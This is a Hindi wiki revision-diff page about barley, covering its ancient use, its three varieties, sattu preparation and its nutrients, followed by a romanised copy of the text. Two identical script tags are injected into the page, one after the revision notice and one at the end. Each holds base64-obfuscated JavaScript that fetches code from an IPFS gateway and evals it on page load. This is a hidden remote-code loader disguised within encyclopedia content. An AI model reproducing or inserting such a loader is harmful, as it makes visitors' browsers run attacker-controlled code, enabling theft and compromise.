Difference between revisions of "जौ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खास" to "ख़ास")
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
 
[[चित्र:Barley.jpg|thumb|250px|जौ<br />Barley]]
 
[[चित्र:Barley.jpg|thumb|250px|जौ<br />Barley]]
प्राचीन काल से ही जौ का उपयोग होता रहा है। हमारे [[ऋषि|ऋषियों]]-मुनियों का प्रमुख आहार जौ ही था। [[वेद|वेदों]] द्वारा [[यज्ञ]] की आहुति के रूप में जौ को स्वीकारा गया है। स्वाद और आकृति के दृष्टिकोण से जौ, [[गेहूँ]] से एक दम भिन्न दिखाई पड़ते हैं, किन्तु यह गेहूँ की जाति का ही अन्न है अगर गुण की नज़र से देखा जाये तो जौ-गेहूँ की अपेक्षा हल्का होता है और मोटा अनाज भी होता है जो कि पूरे [[भारत]] में पाया जाता है। जौ के पौधे गेहूँ के पौधे के समान होते हैं और उतनी ही ऊंचाई भी होती है। जौ खास तौर पर 3 तरह की होती है। तीक्ष्ण नोक वाले, नोकरहित और हरापन लिए हुए बारीक। नोकदार जौ को यव, बिना नोक के काले तथा लालिमा लिए हुए जौ को अतयव एवं हरापन लिए हुए नोकरहित बारीक जौ को तोक्ययव कहते हैं। यव की अपेक्षा अतियव और अतियव की अपेक्षा तोक्ययव कम गुण माने वाले जाते हैं।
+
प्राचीन काल से ही जौ का उपयोग होता रहा है। हमारे [[ऋषि|ऋषियों]]-मुनियों का प्रमुख आहार जौ ही था। [[वेद|वेदों]] द्वारा [[यज्ञ]] की आहुति के रूप में जौ को स्वीकारा गया है। स्वाद और आकृति के दृष्टिकोण से जौ, [[गेहूँ]] से एक दम भिन्न दिखाई पड़ते हैं, किन्तु यह गेहूँ की जाति का ही अन्न है अगर गुण की नज़र से देखा जाये तो जौ-गेहूँ की अपेक्षा हल्का होता है और मोटा अनाज भी होता है जो कि पूरे [[भारत]] में पाया जाता है। जौ के पौधे गेहूँ के पौधे के समान होते हैं और उतनी ही ऊंचाई भी होती है। जौ ख़ास तौर पर 3 तरह की होती है। तीक्ष्ण नोक वाले, नोकरहित और हरापन लिए हुए बारीक। नोकदार जौ को यव, बिना नोक के काले तथा लालिमा लिए हुए जौ को अतयव एवं हरापन लिए हुए नोकरहित बारीक जौ को तोक्ययव कहते हैं। यव की अपेक्षा अतियव और अतियव की अपेक्षा तोक्ययव कम गुण माने वाले जाते हैं।
 
;रंग
 
;रंग
 
जौ का रंग पीला व सफ़ेद होता है।
 
जौ का रंग पीला व सफ़ेद होता है।

Revision as of 07:38, 2 July 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|250px|jau
Barley
prachin kal se hi jau ka upayog hota raha hai. hamare rrishiyoan-muniyoan ka pramukh ahar jau hi tha. vedoan dvara yajn ki ahuti ke roop mean jau ko svikara gaya hai. svad aur akriti ke drishtikon se jau, gehooan se ek dam bhinn dikhaee p date haian, kintu yah gehooan ki jati ka hi ann hai agar gun ki nazar se dekha jaye to jau-gehooan ki apeksha halka hota hai aur mota anaj bhi hota hai jo ki poore bharat mean paya jata hai. jau ke paudhe gehooan ke paudhe ke saman hote haian aur utani hi ooanchaee bhi hoti hai. jau khas taur par 3 tarah ki hoti hai. tikshn nok vale, nokarahit aur harapan lie hue barik. nokadar jau ko yav, bina nok ke kale tatha lalima lie hue jau ko atayav evan harapan lie hue nokarahit barik jau ko tokyayav kahate haian. yav ki apeksha atiyav aur atiyav ki apeksha tokyayav kam gun mane vale jate haian.

rang

jau ka rang pila v safed hota hai.

svaroop

jau ek prakar ka anaj hai.

jangali jati

jau ki ek jangali jati bhi hoti hai. us jati ke jau ka upayog- yoorop, amerika, chin, japan adi deshoan mean aushadhiyaan banane ke lie hota hai. thumb|250px|left|jau
Barley

sattoo

jau ko bhoonakar, pis kar, us ate mean tho da-sa namak aur pani milane par sattoo banata hai. kuchh log sattoo mean namak ke sthan par gu d dalate haian v sattoo mean ghi aur shakkar milakar bhi khaya jata hai.

gun

  • jau bimar logoan ke lie uttam pathy hai.
  • jau mean se lektik esid, sailisilik esid, phasphorik esid, potaishiyam aur kailshiyam upalabdh hota hai.
  • jau mean alpamatra mean kairotin bhi hai.
  • suprasiddh malatain kadalivar namak dava mean jau ka upayog hota hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>